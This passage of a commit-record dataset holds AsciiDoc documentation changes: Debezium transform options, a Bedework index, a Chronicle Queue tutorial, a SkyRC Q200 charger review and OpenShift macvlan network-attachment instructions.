dropped.\n\n[NOTE]\n====\nThe SMT by default filters out *both* delete records as widely used sink connectors do not support handling of tombstone messages at this point.\n====\n\n=== Adding metadata fields to the message\n\nThe SMT can optionally add metadata fields from the original change event to the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.fields=op,table,lsn,source.ts_ms\n----\n\nwill add\n\n----\n{ \"__op\" : \"c\", __table\": \"MY_TABLE\", \"__lsn\": \"123456789\", \"__source_ts_ms\" : \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n=== Adding metadata fields to the header\n\nThe SMT can optionally add metadata fields from the original change event to the header of the final flattened record. This functionality can be used to add things like the operation or the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available see xref:connectors\/index.adoc[the documentation for each connector].\n\nIn case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>_\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.headers=op,table,lsn,source.ts_ms\n----\n\nwill add headers `__op`, `__table`, `__lsn` and `__source_ts_ms` to the outgoing record.\n\n=== Determine original operation [DEPRECATED]\n\n_The `operation.header` option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._\n\nWhen a message is flattened the final result won't show whether it was an insert, update or first read\n(deletions can be detected via tombstones or rewrites, see link:#configuration_options[Configuration options]).\n\nTo solve this problem Debezium offers an option to propagate the original operation via a header added to the message.\nTo enable this feature the option `operation.header` must be set to `true`.\n\n[source]\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.operation.header=true\n----\n\nThe possible values are the ones from the `op` field of the original change event.\n\n=== Adding source metadata fields [DEPRECATED]\n\n_The `add.source.fields` option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nThe SMT can optionally add metadata fields from the original change event's `source` structure to the final flattened record (prefixed with \"__\"). This functionality can be used to add things like the table from the change event, or connector-specific fields like the Postgres LSN field. For more information on what's available in the source structure see xref:connectors\/index.adoc[the documentation for each connector].\n\nFor example, the configuration\n\n----\ntransforms=unwrap,...\ntransforms.unwrap.type=io.debezium.transforms.ExtractNewRecordState\ntransforms.unwrap.add.source.fields=table,lsn\n----\n\nwill add\n\n----\n{ \"__table\": \"MY_TABLE\", \"__lsn\": \"123456789\", ...}\n----\n\nto the final flattened record.\n\nFor `DELETE` events, this option is only supported when the `delete.handling.mode` option is set to \"rewrite\".\n\n[[configuration_options]]\n== Configuration options\n[cols=\"35%a,10%a,55%a\",options=\"header\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`drop.tombstones`\n|`true`\n|The SMT removes the tombstone generated by Debezium from the stream.\n\n|`delete.handling.mode`\n|`drop`\n|The SMT can `drop` (the default), `rewrite` or pass delete events (`none`). The rewrite mode will add a `__deleted` column with true\/false values based on record operation.\n\n\n|`route.by.field`\n|\n|The column which determines how the events will be routed, the value will the topic name; obtained from the old record state for delete events, and from the new record state otherwise\n\n|`add.fields`\n|\n|Specify a list of metadata fields to add to the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`add.headers`\n|\n|Specify a list of metadata fields to add to the header of the flattened message. In case of duplicate field names (e.g. \"ts_ms\" exists twice), the struct should be specified to get the correct field (e.g. \"source.ts_ms\"). The fields will be prefixed with \"\\\\__\" or \"__<struct>__\", depending on the specification of the struct. Please use a comma separated list without spaces.\n\n|`operation.header` DEPRECATED\n|`false`\n|_This option is deprecated and scheduled for removal. Please use add.headers instead. If both add.headers and operation.header are specified, the latter will be ignored._ \n\nThe SMT adds the event operation (as obtained from the `op` field of the original record) as a message header.\n\n|`add.source.fields` DEPRECATED\n|\n|_This option is deprecated and scheduled for removal. Please use add.fields instead. If both add.fields and add.source.fields are specified, the latter will be ignored._\n\nFields from the change event's `source` structure to add as metadata (prefixed with \"__\") to the flattened record. Please no\n|=======================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"351b4cf459d946dfb6cfe316acf93c3d260d5f63","subject":"More notes and small bash fixes","message":"More notes and small bash fixes\n","repos":"Bedework\/bedework","old_file":"src\/main\/asciidoc\/index.adoc","new_file":"src\/main\/asciidoc\/index.adoc","new_contents":"= Bedework Enterprise Calendar System\n:title: Bedework Enterprise Calendar System\n:doctype: standard\n:imagesdir: .\/resources\/\n:toc: left\n:toclevels: 3\n:sectnumlevels: 3\n\n:overview-dir: overview\/\n:admin-dir: administrators\/\n:deployer-dir: deployers\/\n:dev-dir: development\/\n:older-dir: older\/\n\n:sectnums!:\n\ninclude::foreword.adoc[]\ninclude::introduction.adoc[]\n\n:sectnums:\n\n[[overview]]\n== Overview\n\ninclude::{overview-dir}features.adoc[]\ninclude::{overview-dir}release-notes.adoc[]\ninclude::{overview-dir}issues.adoc[]\ninclude::{overview-dir}system-overview.adoc[]\ninclude::{overview-dir}history.adoc[]\ninclude::{overview-dir}standards.adoc[]\ninclude::{overview-dir}technologies.adoc[]\n\n== General Administration\ninclude::{admin-dir}reindex.adoc[]\n\n== Public Administrator Features\ninclude::{admin-dir}addTopicalArea.adoc[]\ninclude::{admin-dir}eventRegistration.adoc[]\ninclude::{admin-dir}subscriptions.adoc[]\ninclude::{admin-dir}authusers.adoc[]\n\n== Deployers\ninclude::{deployer-dir}installing.adoc[]\ninclude::{deployer-dir}installing-quickstart.adoc[]\ninclude::{deployer-dir}deploying-servers.adoc[]\ninclude::{deployer-dir}configure-wildfly.adoc[]\ninclude::{deployer-dir}databases.adoc[]\ninclude::{deployer-dir}elasticsearch.adoc[]\ninclude::{deployer-dir}eventRegistration.adoc[]\ninclude::{deployer-dir}synch-engine.adoc[]\ninclude::{deployer-dir}locations.adoc[]\n\n== Development\ninclude::{dev-dir}todo.adoc[]\ninclude::{dev-dir}caldavtester.adoc[]\n\n[[older-releases]]\n== Older Bedework Versions (3.10 and Prior)\ninclude::{older-dir}releases.adoc[]\n","old_contents":"= Bedework Enterprise Calendar System\n:title: Bedework Enterprise Calendar System\n:doctype: standard\n:imagesdir: .\/resources\/\n:toc: left\n:toclevels: 3\n:sectnumlevels: 3\n\n:overview-dir: overview\/\n:admin-dir: administrators\/\n:deployer-dir: deployers\/\n:dev-dir: development\/\n:older-dir: older\/\n\n:sectnums!:\n\ninclude::foreword.adoc[]\ninclude::introduction.adoc[]\n\n:sectnums:\n\n[[overview]]\n== Overview\n\ninclude::{overview-dir}features.adoc[]\ninclude::{overview-dir}release-notes.adoc[]\ninclude::{overview-dir}issues.adoc[]\ninclude::{overview-dir}system-overview.adoc[]\ninclude::{overview-dir}history.adoc[]\ninclude::{overview-dir}standards.adoc[]\ninclude::{overview-dir}technologies.adoc[]\n\n== General Administration\ninclude::{admin-dir}reindex.adoc[]\n\n== Public Administrator Features\ninclude::{admin-dir}eventRegistration.adoc[]\ninclude::{admin-dir}subscriptions.adoc[]\ninclude::{admin-dir}authusers.adoc[]\n\n== Deployers\ninclude::{deployer-dir}installing.adoc[]\ninclude::{deployer-dir}installing-quickstart.adoc[]\ninclude::{deployer-dir}deploying-servers.adoc[]\ninclude::{deployer-dir}configure-wildfly.adoc[]\ninclude::{deployer-dir}databases.adoc[]\ninclude::{deployer-dir}elasticsearch.adoc[]\ninclude::{deployer-dir}eventRegistration.adoc[]\ninclude::{deployer-dir}synch-engine.adoc[]\ninclude::{deployer-dir}locations.adoc[]\n\n== Development\ninclude::{dev-dir}todo.adoc[]\ninclude::{dev-dir}caldavtester.adoc[]\n\n[[older-releases]]\n== Older Bedework Versions (3.10 and Prior)\ninclude::{older-dir}releases.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee753d5004cdb77de332854c750ef4937b1ea17","subject":"Simple input tutorial","message":"Simple input tutorial\n","repos":"OpenHFT\/Chronicle-Queue-Sample","old_file":"simple-input\/README.adoc","new_file":"simple-input\/README.adoc","new_contents":"= Chronicle-Queue-Sample\n\nFirst open the module `Chronicle-Queue-Sample`.\nGo to the sub-module `simple-input`, then `src`, `main`, `java` and `net.openhft.chronicle.queue.simple.input`.\n\nThis will that you to `InputMain.java` and `OutputMain.java` java classes.\nThis is one of the simple demonstrations of how Chronicle Queue can be used.\n\nSelect `InputMain` from the side bar and run `InputMain.java` by right-clicking on the code and selecting `Run 'InputMain.main()'`.\nAfter the code has been run the first time using this method, the green arrow in the top right of the screen can be used to run that code again the next time.\n\nA window at the bottom of the screen will appear with the words `type something`, as the code has instructed it to do.\n\nYou may write anything you wish in this window and your `Enter` button to submit it.\n\nThe program will then again ask you to `type something`, and again you should type another word.\n\nThis program is set on a loop and will continue to pose this same instruction until it is broken.\nThis is done by not writing anything and leaving the next line blank before pressing `Enter`.\n\nIt is recommended that you type at least three words for the sake of this example.\n\nThe excitement doesn't end here, however.\nYou must then open `OutputMain.java` and run that by right-clicking on the code, the same way you ran `InputMain.java`.\n\nA new window will appear next to the `InputMain` one, simple listing the content you previously entered.\n\nThis demonstrates a program that can store and recall data that is submitted in another place.\n\n","old_contents":"= Chronicle-Queue-Sample\n\nFirst open the module***** `Chronicle-Queue-Sample`. Go to the sub-module `simple-input`, then `src`, `main`, `java` and `net.openhft.chronicle.queue.simple.input`.\n\nThis will that you to `InputMain.java` and `OutputMain.java` java classes.***** This is one of the simple demonstrations of how Chronicle Queue can be used.\n\nSelect `InputMain` from the side bar and run `InputMain.java` by right-clicking on the code and selecting `Run 'InputMain.main()'`.\nAfter the code has been run the first time using this method, the green arrow in the top right of the screen can be used to run that code again the next time.\n\nA window at the bottom of the screen will appear with the words `type something`, as the code has instructed it to do.\n\nYou may write anything you wish in this window and your `Enter` button to submit it.\n\nThe program will then again ask you to `type something`, and again you should type another word.\n\nThis program is set on a loop and will continue to pose this same instruction until it is broken.\nThis is done by not writing anything and leaving the next line blank before pressing `Enter`.\n\nIt is recommended that you type at least three words for the sake of this example.\n\nThe excitement doesn't end here, however.\nYou must then open `OutputMain.java` and run that by right-clicking on the code, the same way you ran `InputMain.java`.\n\nA new window will appear next to the `InputMain` one, simple listing the content you previously entered.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8792dece8d62593be1f21c964c6634bb3cd0f042","subject":"Update 2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","message":"Update 2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","new_file":"_posts\/2015-04-15-Montar-el-entorno-de-trabajo-adecuado-12.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"048696c7340aaebe4ff0d60884b503256df3fa92","subject":"Update 2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","message":"Update 2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"89184b9781fe3bcd1ff7ec55f4867828e91b1e69","subject":"Update 2016-03-06-Study-plan.adoc","message":"Update 2016-03-06-Study-plan.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2016-03-06-Study-plan.adoc","new_file":"_posts\/2016-03-06-Study-plan.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"418731d5adb2ad5848c3dd8668eaea7a3512218f","subject":"Update 2016-12-22-SkyRC-Q200-Review.adoc","message":"Update 2016-12-22-SkyRC-Q200-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-SkyRC-Q200-Review.adoc","new_file":"_posts\/2016-12-22-SkyRC-Q200-Review.adoc","new_contents":"= SkyRC Q200 - Review\n:published_at: 2016-12-22\n:hp-tags: SkyRC, Charger, Q200,\nOct\u00e1vio Maia <octaviojmaia@gmail.com>\n\nimage::http:\/\/www.skyrc.com\/image\/data\/980px_en\/Q200\/01.jpg[]\n\n== Introduction \n\nWelcome to my review of the SkyRC Q200 review. +\nBefore heading further into this review, I\u2019d like to thank Shawn Tong over at SkyRC for making this review possible and Pedro over at Ibermodel for sending the actual unit for review!\n\n== Overview\n\nLet\u2019s firstly take a look at the box that the Q200 comes in.\n\n*[BOX PICTURES]*\n\nIt\u2019s a well built box that includes all the information you might need to know printed on the box.\n\n\n*Specifications:*\n\n * AC Input: 100 \u2013 240 V (up to 200W)\n * DC Input: 11 \u2013 18 V (up to 300W)\n * Current: Max. 200mA \/ cell \n * LiPo \/ LiFe \/ LiHV \/ Li-Ion \/ NiMH \/ NiCD \/ Pb\n * Product weight: 1.3 kg \n * Package weight: 2.1 kg \n * Product size (L x W x H): 19.70 x 18.20 x 7.10 cm \n * Package size (L x W x H): 22.00 x 20.00 x 8.00 cm\n * 4 charging ports, each with it\u2019s own temperature sensor port alongside with the correspondent balance port.\n * MicroUSB connector for the PC Link Software\n * USB Power output rated at 5V\/2.1A\n\n== Unboxing\n\nInside the box we'll find the following items:\n\n * SkyRC Q200 Charger\n * Manual\n * 4 x XH balance boards \n * 4 x leads with XT60 connectors (all the XT60 leads come with a plastic holder that make plugging in your leads much easier. A nice touch)\n * 2 x leads with no connector (useful for making your owns connectors, e.g: Deans connector, DC jack, etc.)\n * Power cable\n\n*[ACCESSORIES PICTURES]* +\nBut what is the big deal about this new charger from SkyRC? +\nIt\u2019s the latest 4-port charger from SkyRC, making it very useful for charging multiple LiPo batteries at the same time without resorting to parallel boards that can often cause unbalanced cells or other issues. \n\nThis is a very well built charger, and while made of platic, it's a very high quality finish. +\nI rather enjoy the plastic unit instead of aluminum due to the impossibility of accidentally shorting something on the metal frame.\n\nAll the cables are made of high quality silicone wire, which is a must nowadays. +\nThe manual is also very well printed and has everything needed in case you are unware how the charger works.\n\n\n== Charging\n\n*[BATTERIES CHARGING PICTURES]* +\nThe charger has a power switch, which I consider very useful and also has two cooling fans, which while charging are very silent, but when discharging 4 batteries at the same time they can ramp up quite easily. +\nThe Q200 main advantage over it\u2019s competition is it\u2019s compact size and the 4 completely independent charging ports, that can easily be configured to charge different chemistry batteries at the same time, without causing issues to other packs. This is very useful when charging LiPo and Li-Ion 18650 cells. It\u2019s also LiHV compatible, which not all chargers are. +\n\n*[LIPO AND LI ION CHARGING PIC]* +\n\n=== Field Charging\n\nIt also allows for AC input without the need for a power supply, due to its integrated power supply. It\u2019s also capable of using DC current, which can be useful for field charging with a car battery or even a big LiPo battery. +\n\n*[POWERBANK PIC]* \n\n=== Charging procedure\n\nIt\u2019s a very intuitive charger, and can be controlled like all standard 4-button chargers, with another button to control which channel is selected. Everything is displayed on a very nice quality colour screen, with a resolution of 480x320 pixels (sadly this is not a touch screen, but for the price point it's understandable). +\nIt also allows for customizable power outputs between channels A\/C and B\/D when using AC mode. +\nBy default each channel is set at 50W, but can easily be changed. This can be useful if you\u2019re charging a big mAh LiPo battery, like a 5000mAh unit since you can set appropriate wattage values for charging. +\nOnce you setup the desired wattage on channel B, for example 79W, then channel D will automatically be set to 21W due to the 100W restriction. The same happens on channels A and C.\n\n\nimage::https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io\/blob\/master\/images\/watts.PNG?raw=trueG[]\n\nChannels A\/C can be used to charge up to 10A, while C\/D can charge up to 5A. +\n\n=== Discharging\n\nDischarge rates are limited to 10W per channel, which for 4s is 0.6A per channel. +\n\n*[DISCARGE PIC]*\n\n== Extra Features\n\n=== IR Measurement\n\nAlong with standard features like Battery meter, it also supports IR Resistance measurement, which is useful for battery maintenance and tracking. +\n*[IR MEASUREMENT picture]*\n\n=== Bluetooth App\n\nAnother feature of the Q200 charger is that it has its own Bluetooth app for smartphones. +\nFrom what I\u2019ve been able to tell Bluetooth is always on, although it would be nice if it had an option to turn it off in the settings. +\nAlthough thinking I would rarely use this app I find it very useful and have come to use it very often. I have set a QR code for LiPo balance charging, which I use often with the app. +\nAll I have to do is I scan the QR code and it automatically starts balance charging my 4S LiPo batteries at 1.3A, which is very useful and straight-forward.\n\n*[BLUETOOTH APP]*\n\n=== Device charging\n\nThis device also supports charging any device that can be charged using an USB Port. It outputs 5V\/2.1A which is more than enough for charging your typical smartphone or tablet device. Due to outputting 2.1A it can also charge more power dense devices, like powerbanks.\n\n*[DEVICE CHARGING]*\n\n== Ending thoughts\n\nWhat can I say about this charger? Is it good enough to recommend purchasing? +\nShortly, yes, definitely!\n\n*Pros:*\n\n\t* Well built.\n * Allows up to 4 batteries charging at the same time.\n * LiHV support.\n * Built-in power supply!\n * Compact size.\n * Supports AC and DC current.\n * Beautiful and intuitive screen.\n * Bluetooth app support.\n * QR Code support.\n\n*Cons:*\n\n\t* No way to turn off Bluetooth (minor complaint here)\n * No touch screen.\n * 200W may not be enough when charging several high capacity LiPo batteries at 1C.\n\nIf you're interested in purchasing a SkyRC Q200, be sure to reach out to Pedro over at Ibermodel. He'll be sure to have one shipped to you at a very affordable price.\n\nEmail: pedro@ibermodel.es +\nTelephone: 945601444 (Spain)","old_contents":"= SkyRC Q200 - Review\n:published_at: 2016-12-22\n:hp-tags: SkyRC, Charger, Q200,\nOct\u00e1vio Maia <octaviojmaia@gmail.com>\n\nimage::http:\/\/www.skyrc.com\/image\/data\/980px_en\/Q200\/01.jpg[]\n\n== Introduction\n\nWelcome to my review of the SkyRC Q200 review. +\nBefore heading further into this review, I\u2019d like to thank Shawn Tong over at SkyRC for sending me this charger and making all of this possible!\n\n== Overview\n\nLet\u2019s firstly take a look at the box that the Q200 comes in.\n\n*[BOX PICTURES]*\n\nIt\u2019s a well built box that includes all the information you might need to know printed on the box.\n\n\n*Specifications:*\n\n * AC Input: 100 \u2013 240 V (up to 200W)\n * DC Input: 11 \u2013 18 V (up to 300W)\n * Current: Max. 200mA \/ cell \n * LiPo \/ LiFe \/ LiHV \/ Li-Ion \/ NiMH \/ NiCD \/ Pb\n * Product weight: 1.3 kg \n * Package weight: 2.1 kg \n * Product size (L x W x H): 19.70 x 18.20 x 7.10 cm \n * Package size (L x W x H): 22.00 x 20.00 x 8.00 cm\n * 4 charging ports, each with it\u2019s own temperature sensor port alongside with the correspondent balance port.\n * MicroUSB connector for the PC Link Software\n * USB Power output rated at 5V\/2.1A\n\n=== Unboxing\n\nInside the box we'll find the following items:\n\n * SkyRC Q200 Charger\n * Manual\n * 4 x XH balance boards \n * 4 x leads with XT60 connectors (all the XT60 leads come with a plastic holder that make plugging in your leads much easier. A nice touch)\n * 2 x leads with no connector (useful for making your owns connectors, e.g: Deans connector, DC jack, etc.)\n * Power cable\n\n*[ACCESSORIES PICTURES]* +\nBut what is the big deal about this new charger from SkyRC? +\nIt\u2019s the latest 4-port charger from SkyRC, making it very useful for charging multiple LiPo batteries at the same time without resorting to parallel boards that can often cause unbalanced cells or other issues. +\n\n=== Charging\n\n*[BATTERIES CHARGING PICTURES]* +\nThe charger has a power switch, which I consider very useful and also has two cooling fans, which while charging are very silent, but when discharging 4 batteries at the same time they can ramp up quite easily. +\nThe Q200 main advantage over it\u2019s competition is it\u2019s compact size and the 4 completely independent charging ports, that can easily be configured to charge different chemistry batteries at the same time, without causing issues to other packs. This is very useful when charging LiPo and Li-Ion 18650 cells. It\u2019s also LiHV compatible, which not all chargers are. +\n\n*[LIPO AND LI ION CHARGING PIC]* +\n\n==== Field Charging\n\nIt also allows for AC input without the need for a power supply, due to its integrated power supply. It\u2019s also capable of using DC current, which can be useful for field charging with a car battery or even a big LiPo battery. +\n\n*[POWERBANK PIC]* \n\n==== Charging procedure\n\nIt\u2019s a very intuitive charger, and can be controlled like all standard 4-button chargers, with another button to control which channel is selected. Everything is displayed on a very nice quality colour screen, with a resolution of 480x320 pixels. +\nIt also allows for customizable power outputs between channels A\/C and B\/D when using AC mode. +\nBy default each channel is set at 50W, but can easily be changed. This can be useful if you\u2019re charging a big mAh LiPo battery, like a 5000mAh unit since you can set appropriate wattage values for charging. +\nOnce you setup the desired wattage on channel A, for example 79W, then channel C will automatically be set to 21W due to the 100W restriction.\n\n\nimage::https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io\/blob\/master\/images\/watts.PNG?raw=trueG[]\n\nChannels A\/C can be used to charge up to 10A, while C\/D can charge up to 5A. +\n\n==== Discharging\n\nDischarge rates are limited to 10W per channel, which for 4s is 0.6A per channel. +\n\n*[DISCARGE PIC]*\n\n== Extra Features\n\n=== IR Measurement\n\nAlong with standard features like Battery meter, it also supports IR Resistance measurement, which is useful for battery maintenance and tracking. +\n*[IR MEASUREMENT picture]*\n\n=== Bluetooth App\n\nAnother feature of the Q200 charger is that it has its own Bluetooth app for smartphones. +\nFrom what I\u2019ve been able to tell Bluetooth is always on, although it would be nice if it had an option to turn it off in the settings. +\nAlthough thinking I would rarely use this app I find it very useful and have come to use it very often. I have set a QR code for LiPo balance charging, which I use often with the app. +\nAll I have to do is I scan the QR code and it automatically starts balance charging my 4S LiPo batteries at 1.3A, which is very useful and straight-forward.\n\n*[BLUETOOTH APP]*\n\n=== Device charging","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"adf03b5b5c0c6f93ae85f8caf6745ff0aabd2bcc","subject":"Make style changes in CNI content","message":"Make style changes in CNI content\n\n- https:\/\/bugzilla.redhat.com\/show_bug.cgi?id=1708542\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-multinetwork-creating-first-attachments.adoc","new_file":"modules\/nw-multinetwork-creating-first-attachments.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/managing_multinetworking.adoc\n\n[id=\"multinetwork-creating-first-attachments-{context}\"]\n= Creating additional network interfaces\n\nAdditional interfaces for Pods are defined in CNI configurations that are stored\nas Custom Resources (CRs). These CRs can be created, listed, edited, and deleted\nusing the `oc` tool.\n\nThe following procedure configures a `macvlan` interface on a Pod. This\nconfiguration might not apply to all production environments, but you can use\nthe same procedure for other CNI plug-ins.\n\n== Creating a CNI configuration for an additional interface as a CR\n\n[NOTE]\n====\nIf you want to attach an additional interface to a Pod, the CR that defines the\ninterface must be in the same project (namespace) as the Pod.\n====\n\n. Create a project to store CNI configurations as CRs and the Pods that will use\nthe CRs.\n+\n----\n$ oc new-project multinetwork-example\n----\n\n. Create the CR that will define an additional network interface. Create a YAML\nfile called `macvlan-conf.yaml` with the following contents:\n+\n[source,yaml]\n----\napiVersion: \"k8s.cni.cncf.io\/v1\"\nkind: NetworkAttachmentDefinition <1>\nmetadata:\n name: macvlan-conf <2>\nspec:\n config: '{ <3>\n \"cniVersion\": \"0.3.0\",\n \"type\": \"macvlan\",\n \"master\": \"eth0\",\n \"mode\": \"bridge\",\n \"ipam\": {\n \"type\": \"host-local\",\n \"subnet\": \"192.168.1.0\/24\",\n \"rangeStart\": \"192.168.1.200\",\n \"rangeEnd\": \"192.168.1.216\",\n \"routes\": [\n { \"dst\": \"0.0.0.0\/0\" }\n ],\n \"gateway\": \"192.168.1.1\"\n }\n }'\n----\n+\n<1> `kind: NetworkAttachmentDefinition`. This is the name for the CR where this\nconfiguration will be stored. It is a custom extension of Kubernetes that\ndefines how networks are attached to Pods.\n<2> `name` maps to the annotation, which is used in the next step.\n<3> `config`: The CNI configuration is packaged in the `config` field.\n+\nThe configuration is specific to a plug-in, which enables `macvlan`. Note the\n`type` line in the CNI configuration portion. Aside from the IPAM (IP address\nmanagement) parameters for networking, in this example the `master` field must\nreference a network interface that resides on the node(s) hosting the Pod(s).\n\n. Run the following command to create the CR:\n+\n----\n$ oc create -f macvlan-conf.yaml\n----\n\n[NOTE]\n====\nThis example is based on a `macvlan` CNI plug-in. Note that in AWS environments,\nmacvlan traffic might be filtered and, therefore, might not reach the desired\ndestination.\n====\n\n== Managing the CRs for additional interfaces\n\nYou can manage the CRs for additional interfaces using the `oc` CLI.\n\nUse the following command to list the CRs for additional interfaces:\n\n----\n$ oc get network-attachment-definitions.k8s.cni.cncf.io\n----\n\nUse the following command to delete CRs for additional interfaces:\n\n----\n$ oc delete network-attachment-definitions.k8s.cni.cncf.io macvlan-conf\n----\n\n== Creating an annotated Pod that uses the CR\n\nTo create a Pod that uses the additional interface, use an annotation that\nrefers to the CR. Create a YAML file called `samplepod.yaml` for a Pod with the\nfollowing contents:\n\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\nmetadata:\n name: samplepod\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf <1>\nspec:\n containers:\n - name: samplepod\n command: [\"\/bin\/bash\", \"-c\", \"sleep 2000000000000\"]\n image: centos\/tools\n----\n\n<1> The `annotations` field contains `k8s.v1.cni.cncf.io\/networks:\nmacvlan-conf`, which correlates to the `name` field in the CR defined earlier.\n\nRun the following command to create the `samplepod` Pod:\n\n----\n$ oc create -f samplepod.yaml\n----\n\nTo verify that an additional network interface has been created and attached to\nthe Pod, use the following command to list the IPv4 address information:\n\n----\n$ oc exec -it samplepod -- ip -4 addr\n----\n\nThree interfaces are listed in the output:\n\n----\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000 <1>\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP link-netnsid 0 <2>\n inet 10.244.1.4\/24 scope global eth0\n valid_lft forever preferred_lft forever\n4: net1@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link-netnsid 0 <3>\n inet 192.168.1.203\/24 scope global net1\n valid_lft forever preferred_lft forever\n----\n\n<1> `lo`: A loopback interface.\n<2> `eth0`: The interface that connects to the cluster-wide default network.\n<3> `net1`: The new interface that you just created.\n\n=== Attaching multiple interfaces to a Pod\n\nTo attach more than one additional interface to a Pod, specify multiple names,\nin comma-delimited format, in the `annotations` field in the Pod definition.\n\nThe following `annotations` field in a Pod definition specifies different CRs\nfor the additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, tertiary-conf, quaternary-conf\n----\n\nThe following `annotations` field in a Pod definition specifies the same CR for\nthe additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, macvlan-conf\n----\n\n== Viewing the interface configuration in a running Pod\n\nAfter the Pod is running, you can review the configurations of the additional\ninterfaces created. To view the sample Pod from the earlier example, execute the\nfollowing command.\n\n----\n$ oc describe pod samplepod\n----\n\nThe `metadata` section of the output contains a list of annotations, which are\ndisplayed in JSON format:\n\n[source,yaml]\n----\nAnnotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf\n k8s.v1.cni.cncf.io\/networks-status:\n [{\n \"name\": \"openshift-sdn\", <1>\n \"ips\": [\n \"10.131.0.10\"\n ],\n \"default\": true,\n \"dns\": {}\n },{\n \"name\": \"macvlan-conf\",\n \"interface\": \"net1\", <2>\n \"ips\": [ <3>\n \"192.168.1.200\"\n ],\n \"mac\": \"72:00:53:b4:48:c4\", <4>\n \"dns\": {} <5>\n }]\n----\n\n<1> `name` refers to the custom resource name, `macvlan-conf`.\n<2> `interface` refers to the name of the interface in the Pod.\n<3> `ips` is a list of IP addresses as assigned to the Pod.\n<4> `mac` is the MAC address of the interface.\n<5> `dns` refers DNS for the interface.\n\nThe first annotation, `k8s.v1.cni.cncf.io\/networks: macvlan-conf`, refers to the\nCR created in the example. This annotation was specified in the Pod definition.\n\nThe second annotation is `k8s.v1.cni.cncf.io\/networks-status`. There are two\ninterfaces listed under `k8s.v1.cni.cncf.io\/networks-status`.\n\n* The first interface describes the interface for the default network,\n`openshift-sdn`. This interface is created as `eth0`. It is used for\ncommunications within the cluster.\n\n* The second interface is the additional interface that you created, `net1`. The\noutput above lists some key values that were configured when the interface was\ncreated, for example, the IP addresses that were assigned to the Pod.\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * 